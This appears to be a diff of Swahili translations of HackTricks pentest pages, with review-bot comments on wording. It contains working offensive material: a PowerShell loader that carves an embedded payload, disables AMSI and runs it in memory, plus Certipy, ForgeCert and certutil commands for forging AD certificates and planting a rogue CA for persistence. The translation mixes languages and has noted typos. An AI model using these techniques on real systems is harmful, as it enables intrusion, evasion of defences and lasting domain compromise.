HTA ni programu ya Windows inayochanganya **HTML na scripting languages (such as VBScript and JScript)**. Inatengeneza interface ya mtumiaji na inaendeshwa kama programu "fully trusted", bila vizingiti vya modeli ya usalama ya browser.
HTA ni programu ya Windows ambayo **inachanganya HTML na lugha za scripting (such as VBScript and JScript)**. Inaunda kiolesura cha mtumiaji na inatekelezwa kama programu "fully trusted", bila vikwazo vya modeli ya usalama ya browser.
HTA inaendeshwa kwa kutumia **`mshta.exe`**, ambayo kwa kawaida **imewekwa** pamoja na **Internet Explorer**, na hivyo **`mshta` inategemea IE**. Hivyo ikiwa imeondolewa, HTA haziwezi kuendeshwa.
HTA inatekelezwa kwa kutumia **`mshta.exe`**, ambayo kwa kawaida **huwekwa** pamoja na **Internet Explorer**, na hivyo kufanya **`mshta` dependant on IE**. Hivyo, kama imeondolewa, HTA hazitaweza kutekelezwa.
```html
<--! Basic HTA Execution -->
<html>
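Review bot: `na hivyo kufanya **`mshta` dependant on IE**` leaves an English fragment (with "dependant" for "dependent") inside a Swahili sentence; the removed line's `**`mshta` inategemea IE**` already said this in Swahili. Unrelated to this change but visible in the context: the HTA sample opens with `<--! Basic HTA Execution -->`, which is not a valid HTML comment (`<!-- ... -->`); worth fixing in the source file.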
@ -140,9 +140,9 @@ self.close
```
## Kulazimisha NTLM Authentication
Kuna njia kadhaa za **kulazimisha NTLM authentication "kwa mbali"**, kwa mfano, unaweza kuongeza **picha zisizoonekana** kwenye barua pepe au HTML ambazo mtumiaji atafikia (hata HTTP MitM?). Au tuma mwathiriwa **anwani ya mafaili** ambayo itatazua **authentication** tu kwa **kufungua folda.**
Kuna njia kadhaa za **kulazimisha NTLM authentication "remotely"**, kwa mfano, unaweza kuongeza **picha zisizoonekana** kwenye barua pepe au HTML ambazo mtumiaji ataziingia (hata HTTP MitM?). Au mtume mwathiriwa **anuani ya faili** ambayo itawasha **authentication** kwa kufungua folda tu.
**Angalia mawazo haya na mengine kwenye kurasa zifuatazo:**
**Angalia mawazo haya na zaidi katika kurasa zifuatazo:**
{{#ref}}
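Review bot: the rewritten NTLM sentence introduces the misspelling `anuani ya faili` where the removed line correctly had `anwani ya mafaili`. `Au mtume mwathiriwa ...` also reads as the noun "mtume" (messenger); `Au tuma kwa mwathiriwa ...` is unambiguous. The remaining changes in this hunk (`**kulazimisha NTLM authentication "remotely"**`, `**Angalia mawazo haya na zaidi ...**`) are fine.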
@ -156,24 +156,24 @@ Kuna njia kadhaa za **kulazimisha NTLM authentication "kwa mbali"**, kwa mfano,
### NTLM Relay
Usisahau kuwa hutaweza tu kuiba hash au authentication lakini pia **kutekeleza NTLM relay attacks**:
Usisahau kwamba huwezi kuiba tu hash au authentication, bali pia **perform NTLM relay attacks**:
- [**NTLM Relay attacks**](../pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md#ntml-relay-attack)
- [**AD CS ESC8 (NTLM relay to certificates)**](../../windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md#ntlm-relay-to-ad-cs-http-endpoints-esc8)
## LNK Loaders + ZIP-Embedded Payloads (fileless chain)
Kampeni zenye ufanisi mkubwa huzalisha ZIP inayojumuisha nyaraka mbili halali za kuibua (PDF/DOCX) na .lnk hatarishi. Njia ni kwamba loader halisi ya PowerShell imehifadhiwa ndani ya raw bytes za ZIP baada ya alama ya kipekee, na .lnk inachonga na kuendesha yote ndani ya kumbukumbu.
Kampeni zenye ufanisi mkubwa hutuma ZIP inayojumuisha hati mbili halali za kuwadanganya (PDF/DOCX) na .lnk yenye madhara. Njia ni kwamba PowerShell loader mwenyewe imehifadhiwa ndani ya raw bytes za ZIP baada ya marker maalum, na .lnk huichonga na kuiendesha yote ndani ya memory.
Mtiririko wa kawaida unaotekelezwa na .lnk PowerShell one-liner:
1) Tafuta ZIP asili katika njia za kawaida: Desktop, Downloads, Documents, %TEMP%, %ProgramData%, na mzazi wa current working directory.
2) Soma bytes za ZIP na tafuta marker iliyowekwa kimagurudumu (mfano, xFIQCV). Kila kitu baada ya marker ni PowerShell payload iliyowekwa.
3) Nakili ZIP hadi %ProgramData%, ifungue hapo, na fungua decoy .docx ili ionekane halali.
4) Kuepuka AMSI kwa mchakato wa sasa: [System.Management.Automation.AmsiUtils]::amsiInitFailed = $true
5) Deobfuscate hatua inayofuata (mfano, ondoa herufi zote #) na itekeleze ndani ya kumbukumbu.
1) Tafuta ZIP asili katika njia za kawaida: Desktop, Downloads, Documents, %TEMP%, %ProgramData%, na parent ya current working directory.
2) Soma bytes za ZIP na upate marker iliyowekwa (mfano, xFIQCV). Kila kitu kilicho baada ya marker ni PowerShell payload iliyowekwa.
3) Nakili ZIP hadi %ProgramData%, extract hapo, na fungua decoy .docx ionekane halali.
4) Kwepa AMSI kwa process ya sasa: [System.Management.Automation.AmsiUtils]::amsiInitFailed = $true
5) Deobfuscate stage inayofuata (mfano, ondoa wote # characters) na uitekelleze ndani ya memory.
Mfano wa skeleton ya PowerShell ili kuchonga na kuendesha hatua iliyowekwa:
Example PowerShell skeleton to carve and run the embedded stage:
```powershell
$marker = [Text.Encoding]::ASCII.GetBytes('xFIQCV')
$paths = @(
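Review bot: the lead-in for the PowerShell skeleton regresses to English, `Example PowerShell skeleton to carve and run the embedded stage:`, replacing the translated `Mfano wa skeleton ya PowerShell ili kuchonga na kuendesha hatua iliyowekwa:`; keep the Swahili line. In the numbered steps, step 5 introduces the typo `uitekelleze` (the removed line has `itekeleze`), and in the NTLM Relay paragraph `bali pia **perform NTLM relay attacks**` mixes languages where the removed line had `**kutekeleza NTLM relay attacks**`.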
@ -190,12 +190,12 @@ $code = [Text.Encoding]::UTF8.GetString($stage) -replace '#',''
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
Invoke-Expression $code
```
Vidokezo
- Delivery often abuses reputable PaaS subdomains (e.g., *.herokuapp.com) and may gate payloads (serve benign ZIPs based on IP/UA).
- Sehemu inayofuata mara nyingi hu-decrypt base64/XOR shellcode na kuitekeleza kupitia Reflection.Emit + VirtualAlloc ili kupunguza artifacts za diski.
Notes
- Usambazaji mara nyingi hutumia vibaya subdomains za PaaS zenye sifa nzuri (mfano, *.herokuapp.com) na inaweza kuweka vizuizi kwa payloads (kutoa ZIP zisizo hatari kulingana na IP/UA).
- Hatua inayofuata mara nyingi hu-decrypt base64/XOR shellcode na kuitekeleza kupitia Reflection.Emit + VirtualAlloc ili kupunguza alama kwenye diski.
Persistence iliyotumika katika mnyororo huo huo
- COM TypeLib hijacking ya Microsoft Web Browser control ili IE/Explorer au app yoyote inayoi-embed irejeshe payload moja kwa moja. See details and ready-to-use commands here:
Persistence used in the same chain
- COM TypeLib hijacking of the Microsoft Web Browser control so that IE/Explorer or any app embedding it re-launches the payload automatically. See details and ready-to-use commands here:
{{#ref}}
../../windows-hardening/windows-local-privilege-escalation/com-hijacking.md
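Review bot: this hunk inverts the language split rather than fixing it: the heading `Vidokezo` becomes the English `Notes` while the two bullets below it are newly translated, and the persistence paragraph (`Persistence iliyotumika katika mnyororo huo huo` and the COM TypeLib bullet) is replaced by its English source `Persistence used in the same chain` / `- COM TypeLib hijacking of the Microsoft Web Browser control ...`. Keep `Vidokezo` with the translated bullets, and restore the removed Swahili persistence lines.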
@ -207,7 +207,16 @@ Hunting/IOCs
- AMSI tampering via [System.Management.Automation.AmsiUtils]::amsiInitFailed.
- Long-running business threads ending with links hosted under trusted PaaS domains.
## References
## Windows files to steal NTLM hashes
Angalia ukurasa kuhusu **places to steal NTLM creds**:
{{#ref}}
../../windows-hardening/ntlm/places-to-steal-ntlm-creds.md
{{#endref}}
## Marejeo
- [Check Point Research ZipLine Campaign: A Sophisticated Phishing Attack Targeting US Companies](https://research.checkpoint.com/2025/zipline-phishing-campaign/)
- [Hijack the TypeLib New COM persistence technique (CICADA8)](https://cicada-8.medium.com/hijack-the-typelib-new-com-persistence-technique-32ae1d284661)

View File

@ -2,26 +2,26 @@
{{#include ../../../banners/hacktricks-training.md}}
**Hii ni muhtasari wa mbinu za domain persistence zilizosambazwa katika [https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf](https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf)**. Angalia kwa maelezo zaidi.
**Huu ni muhtasari wa mbinu za domain persistence zilizoshirikiwa katika [https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf](https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf)**. Angalia kwa maelezo zaidi.
## Forging Certificates with Stolen CA Certificates - DPERSIST1
How can you tell that a certificate is a CA certificate?
Inaweza kubainika kuwa certificate ni CA certificate ikiwa masharti kadhaa yanatimiza:
Inaweza kubainika kwamba certificate ni certificate ya CA ikiwa masharti kadhaa yamekidhiwa:
- Certificate imehifadhiwa kwenye CA server, na private key yake imehifadhiwa kwa DPAPI ya mashine, au kwa hardware kama TPM/HSM ikiwa sistema ya uendeshaji inaunga mkono.
- Sehemu za Issuer na Subject za certificate zinaendana na distinguished name ya CA.
- Extension ya "CA Version" ipo tu katika CA certificates.
- Certificate haijumuishi Extended Key Usage (EKU) fields.
- The certificate is stored on the CA server, with its private key secured by the machine's DPAPI, or by hardware such as a TPM/HSM if the operating system supports it.
- Both the Issuer and Subject fields of the certificate match the distinguished name of the CA.
- A "CA Version" extension is present in the CA certificates exclusively.
- The certificate lacks Extended Key Usage (EKU) fields.
Ili kutoa private key ya certificate hii, zana certsrv.msc kwenye CA server ndiyo njia inayotambulika kupitia GUI iliyojengwa ndani. Hata hivyo, certificate hii haijatofautiana na nyingine zilizohifadhiwa ndani ya mfumo; kwa hivyo, mbinu kama [THEFT2 technique](certificate-theft.md#user-certificate-theft-via-dpapi-theft2) zinaweza kutumika kwa uondoaji.
Ili kutoa private key ya certificate hii, zana certsrv.msc kwenye server ya CA ndiyo njia inayotumiwa kupitia GUI iliyojengwa. Hata hivyo, certificate hii haijatofautiana na zile nyingine zilizo kwenye mfumo; kwa hivyo, mbinu kama [THEFT2 technique](certificate-theft.md#user-certificate-theft-via-dpapi-theft2) zinaweza kutumika kwa ajili ya uondoaji.
The certificate and private key can also be obtained using Certipy with the following command:
```bash
certipy ca 'corp.local/administrator@ca.corp.local' -hashes :123123.. -backup
```
Baada ya kupata cheti cha CA na ufunguo wake wa kibinafsi katika muundo wa `.pfx`, zana kama [ForgeCert](https://github.com/GhostPack/ForgeCert) zinaweza kutumika kuunda vyeti halali:
Baada ya kupata cheti cha CA na ufunguo wake wa siri katika muundo wa `.pfx`, zana kama [ForgeCert](https://github.com/GhostPack/ForgeCert) zinaweza kutumika kutengeneza vyeti halali:
```bash
# Generating a new certificate with ForgeCert
ForgeCert.exe --CaCertPath ca.pfx --CaCertPassword Password123! --Subject "CN=User" --SubjectAltName localadmin@theshire.local --NewCertPath localadmin.pfx --NewCertPassword Password123!
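Review bot: the bullet list after "Inaweza kubainika kwamba certificate ni certificate ya CA ikiwa masharti kadhaa yamekidhiwa:" is a translation regression: the four Swahili bullets ("- Certificate imehifadhiwa kwenye CA server, ...", "- Sehemu za Issuer na Subject ...", ...) are removed and replaced by the English originals ("- The certificate is stored on the CA server, ..."), so a Swahili lead-in now introduces an English list. Keep the removed translated bullets (or translate the new ones); the untouched English question "How can you tell that a certificate is a CA certificate?" directly above the translated answer has the same problem.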
@ -36,19 +36,19 @@ Rubeus.exe asktgt /user:localdomain /certificate:C:\ForgeCert\localadmin.pfx /pa
certipy auth -pfx administrator_forged.pfx -dc-ip 172.16.126.128
```
> [!WARNING]
> Mtumiaji aliyechaguliwa kwa udanganyifu wa vyeti lazima awe hai na aweze kujiuthibitisha katika Active Directory ili mchakato ufanikiwe. Kudanganya cheti kwa akaunti maalum kama krbtgt hakuwezi kufanya kazi.
> Mtumiaji aliyechaguliwa kwa udanganyifu wa cheti lazima awe hai na awe na uwezo wa kuthibitisha utambulisho katika Active Directory ili mchakato ufanikiwe. Kutengeneza cheti kwa akaunti maalum kama krbtgt haifai.
Cheti hiki cha udanganyifu kitaendelea kuwa **halali** hadi tarehe ya mwisho iliyobainishwa na kwa muda **cheti cha root CA** kitakapoendelea kuwa halali (kwa kawaida kutoka miaka 5 hadi **miaka 10+**). Pia ni halali kwa ajili ya **mashine**, hivyo likiunganishwa na **S4U2Self**, mshambuliaji anaweza **kuendeleza persistence kwenye mashine yoyote ya domain** kwa muda wote cheti cha CA kitakapoendelea kuwa halali.\
Zaidi ya hayo, **vyeti vilivyotengenezwa** kwa njia hii **haiwezi kufutwa** kwa kuwa CA haijui kuhusu vyeti hivyo.
Cheti kilichofungwa hiki kitatumika **hadi tarehe ya mwisho** iliyotajwa na kwa **muda ambao cheti cha root CA kitakavyokuwa halali** (kawaida kutoka miaka 5 hadi **10+ years**). Pia kinatumika kwa **mashine**, hivyo ukichanganywa na **S4U2Self**, mshambuliaji anaweza **kutunza udumu kwenye mashine yoyote ya domain** kwa muda wote cheti cha CA kitakachokuwa halali.\
Zaidi ya hayo, **vyeti vinavyotengenezwa** kwa njia hii **haviwezi kukataliwa** kwa sababu CA haijui kuhusu hivyo.
### Kufanya kazi chini ya Utekelezaji Mkali wa Ulinganifu wa Vyeti (2025+)
### Kufanya kazi chini ya utekelezaji mkali wa ramani za vyeti (2025+)
Tangu Februari 11, 2025 (baada ya rollout ya KB5014754), domain controllers kwa chaguo-msingi ziko kwenye **Full Enforcement** kwa certificate mappings. Kwa vitendo, hili lina maana vyeti vyako vilivyoofdanganywa vinapaswa ama:
Tangu February 11, 2025 (baada ya kuenezwa kwa KB5014754), domain controllers kwa chaguo-msingi zimeweka **Full Enforcement** kwa certificate mappings. Kivitendo hili linamaanisha vyeti vyako vya uongo lazima vitokee kwa mojawapo ya:
- Kuwa na uunganisho thabiti na akaunti lengwa (kwa mfano, upanuzaji wa usalama wa SID), au
- Kuambatanishwa na ulinganifu thabiti, wazi kwenye attribute `altSecurityIdentities` ya objekti lengwa.
- Kuwa na uhusiano thabiti na akaunti lengwa (kwa mfano, extension ya usalama ya SID), au
- Kuambatanishwa na ramani thabiti, wazi kwenye sifa ya kitu lengwa `altSecurityIdentities`.
Njia ya kuaminika kwa ajili ya persistence ni kutengeneza cheti cha udanganyifu kilichounganishwa na Enterprise CA iliyotekwa kisha kuongeza ulinganifu thabiti, wazi kwa principal wa mwathirika:
Njia ya kuaminika kwa udumu ni kutengeneza cheti bandia kilichounganishwa na Enterprise CA iliyoibwa kisha kuongeza ramani imara, wazi kwenye victim principal:
```powershell
# Example: map a forged cert to a target account using Issuer+Serial (strong mapping)
$Issuer = 'DC=corp,DC=local,CN=CORP-DC-CA' # reverse DN format expected by AD
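Review bot: terminology drifts within the new lines of this hunk: "mapping(s)" is rendered as "ramani" in the heading "### Kufanya kazi chini ya utekelezaji mkali wa ramani za vyeti (2025+)", in "- Kuambatanishwa na ramani thabiti, wazi ..." and in "kisha kuongeza ramani imara, wazi ...", but is left as "certificate mappings" in "Tangu February 11, 2025 ..."; "persistence" becomes "udumu" in "Njia ya kuaminika kwa udumu ..." while the rest of the file keeps "persistence" (the replaced lines used "ulinganifu" and "persistence"). Settle on one term per concept and use it throughout, and keep "miaka 10+" rather than the mixed "10+ years" in the paragraph on how long the forged certificate stays valid.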
@ -56,15 +56,16 @@ $SerialR = '1200000000AC11000000002B' # serial in reversed byte
$Map = "X509:<I>$Issuer<SR>$SerialR" # strong mapping format
Set-ADUser -Identity 'victim' -Add @{altSecurityIdentities=$Map}
```
Notes
- Ikiwa unaweza kutengeneza vyeti bandia vinavyojumuisha nyongeza ya usalama ya SID, vitafuatana kwa njia ya moja kwa moja hata chini ya Full Enforcement. Vinginevyo, pendelea mapangilio wazi na yenye nguvu. Angalia [account-persistence](account-persistence.md) kwa maelezo zaidi juu ya mapangilio ya wazi.
- Kufutwa hakusaidii watetezi hapa: vyeti bandia havijulikani katika hifadhidata ya CA na kwa hivyo haviwezi kufutwa.
Vidokezo
- If you can craft forged certificates that include the SID security extension, those will map implicitly even under Full Enforcement. Otherwise, prefer explicit strong mappings. See
[account-persistence](account-persistence.md) for more on explicit mappings.
- Revocation haimsaidii watetezi hapa: vyeti bandia havijulikani kwenye hifadhidata ya CA na kwa hivyo haviwezi kukataliwa.
## Kuamini Vyeti vya CA Visivyo Rasmi - DPERSIST2
## Kuamini Rogue CA Certificates - DPERSIST2
Kiobjekti cha `NTAuthCertificates` kimefafanuliwa kuhusisha cheti kimoja au zaidi za **CA certificates** ndani ya sifa yake ya `cacertificate`, ambazo Active Directory (AD) hutumia. Mchakato wa uhakiki unaofanywa na **domain controller** unahusisha kuangalia kiobjekti cha `NTAuthCertificates` kwa kipengele kinacholingana na **CA specified** katika uwanja wa Issuer wa **certificate** inayothibitisha. Uthibitishaji utaendelea ikiwa mechi itapatikana.
The `NTAuthCertificates` object is defined to contain one or more **CA certificates** within its `cacertificate` attribute, which Active Directory (AD) utilizes. The verification process by the **domain controller** involves checking the `NTAuthCertificates` object for an entry matching the **CA specified** in the Issuer field of the authenticating **certificate**. Authentication proceeds if a match is found.
Cheti cha CA chenye saini ya mwenyewe kinaweza kuongezwa kwenye kiobjekti cha `NTAuthCertificates` na mshambulizi, mradi awe na udhibiti wa kiobjekti hiki cha AD. Kwa kawaida, ni wanachama wa kikundi cha **Enterprise Admin**, pamoja na **Domain Admins** au **Administrators** katika **forest roots domain**, wanaoruhusiwa kurekebisha kiobjekti hiki. Wanaweza kuhariri kiobjekti cha `NTAuthCertificates` kwa kutumia `certutil.exe` na amri `certutil.exe -dspublish -f C:\Temp\CERT.crt NTAuthCA`, au kwa kutumia [**PKI Health Tool**](https://docs.microsoft.com/en-us/troubleshoot/windows-server/windows-security/import-third-party-ca-to-enterprise-ntauth-store#method-1---import-a-certificate-by-using-the-pki-health-tool).
A self-signed CA certificate can be added to the `NTAuthCertificates` object by an attacker, provided they have control over this AD object. Normally, only members of the **Enterprise Admin** group, along with **Domain Admins** or **Administrators** in the **forest roots domain**, are granted permission to modify this object. They can edit the `NTAuthCertificates` object using `certutil.exe` with the command `certutil.exe -dspublish -f C:\Temp\CERT.crt NTAuthCA`, or by employing the [**PKI Health Tool**](https://docs.microsoft.com/en-us/troubleshoot/windows-server/windows-security/import-third-party-ca-to-enterprise-ntauth-store#method-1---import-a-certificate-by-using-the-pki-health-tool).
Additional helpful commands for this technique:
```bash
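Review bot: this hunk regresses three already-translated passages back to English: the first bullet under "Vidokezo" ("If you can craft forged certificates that include the SID security extension ..."), which is also now split across two lines mid-sentence ("See" / "[account-persistence](account-persistence.md) for more on explicit mappings."), and the two DPERSIST2 paragraphs ("The `NTAuthCertificates` object is defined ..." and "A self-signed CA certificate can be added ..."), whose Swahili versions are the lines being removed. Restore the removed Swahili lines (they translate the same text) and keep each bullet on a single line to match the rest of the file; "Vidokezo" for "Notes" and the translated "Revocation haimsaidii watetezi hapa ..." bullet can stay.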
@ -77,32 +78,32 @@ certutil -enterprise -delstore NTAuth <Thumbprint>
certutil -dspublish -f C:\Temp\CERT.crt RootCA # CN=Certification Authorities
certutil -dspublish -f C:\Temp\CERT.crt CA # CN=AIA
```
Uwezo huu una umuhimu maalum unapotumika pamoja na mbinu iliyotajwa hapo awali inayohusisha ForgeCert kutengeneza vyeti kwa njia ya dinamiki.
Uwezo huu una umuhimu hasa inapochanganywa na mbinu iliyotajwa hapo awali inayotumia ForgeCert kuunda vyeti kwa wakati wa utekelezaji.
> Post-2025 mapping considerations: placing a rogue CA in NTAuth only establishes trust in the issuing CA. To use leaf certificates for logon when DCs are in **Full Enforcement**, the leaf must either contain the SID security extension or there must be a strong explicit mapping on the target object (for example, Issuer+Serial in `altSecurityIdentities`). See {{#ref}}account-persistence.md{{#endref}}.
> Mambo ya kuzingatia baada ya 2025 kuhusu ulinganishaji: kuweka CA ya kivurugo kwenye NTAuth kunaunda tu uaminifu kwa CA inayotolewa. Ili kutumia vyeti vya leaf kwa kuingia wakati DCs ziko katika **Full Enforcement**, leaf lazima iwe na rozsion ya usalama ya SID au lazima kuwe na ulinganishaji thabiti wazi kwenye kitu lengwa (kwa mfano, Issuer+Serial katika `altSecurityIdentities`). Angalia {{#ref}}account-persistence.md{{#endref}}.
## Usanidi Mbaya - DPERSIST3
Fursa za **persistence** kupitia **urekebishaji wa security descriptor wa vipengele vya AD CS** ni nyingi. Marekebisho yaliyotajwa katika sehemu ya "[Domain Escalation](domain-escalation.md)" yanaweza kutekelezwa kwa nia mbaya na mdhambi mwenye upatikanaji uliopandishwa cheo. Hii inajumuisha kuongeza "control rights" (mfano, WriteOwner/WriteDACL/etc.) kwa vipengele nyeti kama:
Fursa za **persistence** kupitia **mabadiliko ya security descriptor ya vipengele vya AD CS** ni nyingi. Mabadiliko yaliyoelezwa katika sehemu ya "[Domain Escalation](domain-escalation.md)" yanaweza kutekelezwa kwa ubaya na mshambuliaji mwenye upatikanaji ulioboreshwa. Hii ni pamoja na kuongeza "control rights" (mf., WriteOwner/WriteDACL/etc.) kwa vipengele vitakavyokuwa na hatari kama:
- The **CA servers AD computer** object
- The **CA servers RPC/DCOM server**
- Any **descendant AD object or container** in **`CN=Public Key Services,CN=Services,CN=Configuration,DC=<DOMAIN>,DC=<COM>`** (for instance, the Certificate Templates container, Certification Authorities container, the NTAuthCertificates object, etc.)
- **AD groups delegated rights to control AD CS** by default or by the organization (such as the built-in Cert Publishers group and any of its members)
- Objekti la **AD computer** la **CA server**
- **CA servers RPC/DCOM server**
- Kila **objekti au kituzo cha jirani cha AD** katika **`CN=Public Key Services,CN=Services,CN=Configuration,DC=<DOMAIN>,DC=<COM>`** (kwa mfano, container ya Certificate Templates, container ya Certification Authorities, objektu ya NTAuthCertificates, nk.)
- **AD groups zilizopewa haki za kudhibiti AD CS** kwa default au na shirika (kama group ya built-in Cert Publishers na wanachama wake wote)
Mfano wa utekelezwaji wa uharifu ungehusisha mdhambi, aliye na **idhini za juu** ndani ya domain, kuongeza ruhusa ya **`WriteOwner`** kwenye template ya kawaida ya cheti ya **`User`**, akiwa yeye ndiye mhusika wa haki hiyo. Ili kuutumia huu, mdhambi atabadilisha kwanza umiliki wa template ya **`User`** kuwa yeye mwenyewe. Baadaye, **`mspki-certificate-name-flag`** itawekwa kuwa **1** kwenye template ili kuwezesha **`ENROLLEE_SUPPLIES_SUBJECT`**, ikimruhusu mtumiaji kutoa Subject Alternative Name katika ombi. Baadaye, mdhambi anaweza **kujisajili** kwa kutumia **template**, akichagua jina la **domain administrator** kama jina mbadala, na kutumia cheti kilichopatikana kwa uthibitisho kama DA.
Mfano wa utekelezaji mbaya ungehusisha mshambuliaji ambaye ana **idhini iliyoongezwa** katika domain, kuongeza ruhusa ya **`WriteOwner`** kwenye template ya default **`User`**, huku mshambuliaji akiwa ndiye mtendaji wa haki hiyo. Ili kutumia hili, mshambuliaji angebadili umiliki wa template ya **`User`** kuwa wao wenyewe. Baada ya hapo, `mspki-certificate-name-flag` ingetengwa kuwa **1** kwenye template ili kuwezesha **`ENROLLEE_SUPPLIES_SUBJECT`**, kuruhusu mtumiaji kutoa Subject Alternative Name katika ombi. Ifuatayo, mshambuliaji angeweza **kuiandika** kwa kutumia **template**, akichagua jina la **domain administrator** kama jina mbadala, na kutumia cheti alichopata kwa uthibitishaji kama DA.
Mipangilio ya vitendo wadukuzi wanaweza kuweka kwa kudumu ndani ya domain (angalia {{#ref}}domain-escalation.md{{#endref}} kwa maelezo kamili na utambuzi):
Maboresho ya vitendo ambayo mashambulizi yanaweza kuweka kwa persistence ya muda mrefu katika domain (tazama {{#ref}}domain-escalation.md{{#endref}} kwa maelezo kamili na utambuzi):
- CA policy flags that allow SAN from requesters (e.g., enabling `EDITF_ATTRIBUTESUBJECTALTNAME2`). This keeps ESC1-like paths exploitable.
- Template DACL or settings that allow authentication-capable issuance (e.g., adding Client Authentication EKU, enabling `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT`).
- Controlling the `NTAuthCertificates` object or the CA containers to continuously re-introduce rogue issuers if defenders attempt cleanup.
- Bendera za sera za CA zinazoruhusu SAN kutoka kwa waombaji (mf., kuwezesha `EDITF_ATTRIBUTESUBJECTALTNAME2`). Hii inahifadhi njia za aina ya ESC1 ziwe za kutumika.
- DACL ya template au mipangilio inayoruhusu utoaji unaouwezesha uthibitishaji (mf., kuongeza Client Authentication EKU, kuwezesha `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT`).
- Kudhibiti objektu ya `NTAuthCertificates` au containers za CA ili kuendelea kuingiza tena watoleaji wa kivurugo ikiwa watetezi watajaribu kusafisha.
> [!TIP]
> In hardened environments after KB5014754, pairing these misconfigurations with explicit strong mappings (`altSecurityIdentities`) ensures your issued or forged certificates remain usable even when DCs enforce strong mapping.
> Katika mazingira yaliyoimarishwa baada ya KB5014754, kupanganya misconfigurations hizi na ulinganishaji thabiti wazi (`altSecurityIdentities`) kunahakikisha vyeti ulivyovituma au vilivyofanywa kwa udukuzi vinaendelea kutumika hata wakati DCs zinapoiga ulinganishaji thabiti.
## References
- Microsoft KB5014754 Mabadiliko ya certificate-based authentication kwenye Windows domain controllers (ratiba ya utekelezaji na strong mappings). https://support.microsoft.com/en-au/topic/kb5014754-certificate-based-authentication-changes-on-windows-domain-controllers-ad2c23b0-15d8-4340-a468-4d4f3b188f16
- Microsoft KB5014754 Mabadiliko ya uthibitishaji unaotegemea vyeti kwenye Windows domain controllers (muda wa utekelezaji na ulinganifu thabiti). https://support.microsoft.com/en-au/topic/kb5014754-certificate-based-authentication-changes-on-windows-domain-controllers-ad2c23b0-15d8-4340-a468-4d4f3b188f16
- Certipy Command Reference and forge/auth usage. https://github.com/ly4k/Certipy/wiki/08-%E2%80%90-Command-Reference
{{#include ../../../banners/hacktricks-training.md}}
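Review bot: three wording problems in the new lines of this hunk. (1) The blockquote "> Mambo ya kuzingatia baada ya 2025 ..." contains "rozsion ya usalama ya SID", a garbled word; the file elsewhere uses "extension ya usalama ya SID". (2) In the DPERSIST3 example paragraph, "mshambuliaji angeweza **kuiandika** kwa kutumia **template**" renders "enroll" as "write it"; the removed line's "**kujisajili**" is the correct verb. (3) In the TIP, "hata wakati DCs zinapoiga ulinganishaji thabiti" says the DCs "imitate" strong mapping; "enforce" should be "zinapotekeleza". Also "strong mapping" appears as "ulinganishaji thabiti" in the blockquote and as "ulinganifu thabiti" in the KB5014754 reference line; use one term. The English lines removed in this hunk (the DPERSIST3 bullets and the TIP) were untranslated source text, so replacing them with Swahili is correct.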